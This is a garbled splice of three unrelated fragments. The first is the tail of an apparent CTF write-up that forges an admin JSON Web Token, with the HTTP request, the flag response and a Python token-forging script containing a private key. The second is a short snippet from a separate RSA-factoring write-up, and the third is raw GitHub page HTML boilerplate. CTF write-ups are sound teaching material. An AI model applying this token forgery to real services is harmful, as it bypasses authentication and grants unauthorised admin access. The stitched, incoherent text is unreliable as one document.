```POST /get_flag HTTP/2Host: web-jwt-b9766b1f.chal-2021.duc.tfSec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 224
jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6dHJ1ZSwibm93IjoxNjMyNTM2NzYxLjQ2NTE3MzJ9.Chjv26Mt7SJ9A0h2Mf25nwjvpf4Lb8cTj2QliJDPZrPlXVC37LI3fcLylLezLe-wtJz3mGAY1FRvIqvoaie4OBiwygZ_DrTtwiIj5tkbcgbJeHf3M8qEB8pFwQGaDwh1Tg```
And this is the HTTP response that came back:
```HTTP/2 200 OKContent-Type: text/html; charset=utf-8Date: Sat, 25 Sep 2021 02:37:24 GMTServer: nginx/1.21.1Strict-Transport-Security: max-age=15552000Content-Length: 27
DUCTF{json_web_trickeryyy}```
WOOT!
I thought this was a great challenge since it chained together two totally different independent vulnerabilities in order to solve it.
# Notes Added Later
When someone tried to follow these steps, they found that jwt.io could not be used to generate the forged token. Indeed, when I went back to try it, I was unable to get jwt.io to generate this token either! I can't explain why it worked for me originally. I'm glad I took a screenshot to prove it.
Here's an easy alternate way to generate the forged token.
Create a python file containing the following and run it to get the forged token:```import jwt
private_key = """-----BEGIN RSA PRIVATE KEY-----MIIB+wIBAAJhEIt8da7h4rnfNpKizFSxANERACGT68nDz1deSxb1lcwo2bR6ZdHzd0qj2wVkkIVYkjD+I7/MLvh2tBNNr95EhNe96Mm4ABbZya7VOgM0rjSDzIMzdDAeGngppfWACnk4AwIDAQABAmEKpfUIG6wBMAOtnv0vdki0XiDfW6KTMDRDvdcjryUdsIi8WaAV8ZW9z9XWw/v8U/4DrOzW5nJwm2BwMRfpIfKlS/QW0gX/TR+btntJc6P8wnks0vynK8S9A+l4kegxYrSxAmEAkg0einG4Xq9r0BdE1shPeffCNh+VXzu3s5B+LO38Vnz+rfKQwJ5230Nxe8WstSZdUSM/Bp0cGjkPCX5D24bGyaVx9Uz3LO0G9F+g5aC2jw1fU/jyWe9iBCS/Gh7l4N6fAgEdAmBhCOJfrQqHrhj9WlhcMx3KtTeNahJ+AVkdrkSGaV+bvtQekehmcWIdF9wQFdeXS3P4cmhvZnbDXWGGNyOyeKseUhOSnJ4kdR6HwflOVyaziHjre5zY79i5VAi7vAeTDZUCAQUCYG7MKNL1KsNqmGjlg6vEGPtsga15EDaXO+lTIe0eeM7aaO3kJzEFdKlfTUNp0nfE1AiWUx+AA6n2UgczpjybNbN0rroXE8nOS+WGVr/bBhQ/HC4MTevzZNcBZNYFyN+OZw==-----END RSA PRIVATE KEY-----"""
token = jwt.encode({'admin': True, 'now': 1632536761.4651732}, private_key, algorithm='RS256')print(token)```
This outputs the same forged token that I, somehow, got out of jwt.io.
Wow!
I tried jwt.io using the way back machine from just a week earlier and that version **does** produce the token when you paste in the private key.
This proves their behavior changed sometime after I had used their site to solve this challenge.
You can try it out here:
[https://web.archive.org/web/20210914035237/https://jwt.io/](https://web.archive.org/web/20210914035237/https://jwt.io/) |
From the contents of the file it is clear that we are given the public modulus, n the encryption exponent e and a cipher text. In order to be able to decrypt the cipher text, we should be able to exploit some inherent mathematical vulnerability in the prime factors used to compute the public modulus n.
we can easily see that are public modulus is not large enough and should be easily factorable. As factordb lookup is one of the attacks implemented within the RsaCtfTool we directly go ahead and run it. |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tfzZxJCbul4TLTQmD9EJzuvXoLZGUCnWTiuJCGnXlaABfL2eD0I/J/IL9blT+JbF1dQvKi1g/E7396zAKdrZTA==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-b5fcd9c4.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Bs1K/vyZ2bHvgl7D760X4B4rTd1A8ZhqnIzBYtMmXdF7vZ8VmWUo5Xo1jbbTRTTigQeLFs7E9Fa6naPM7tGsyQ==" type="application/javascript" src="https://github.githubassets.com/assets/diffs-06cd4afe.js"></script>
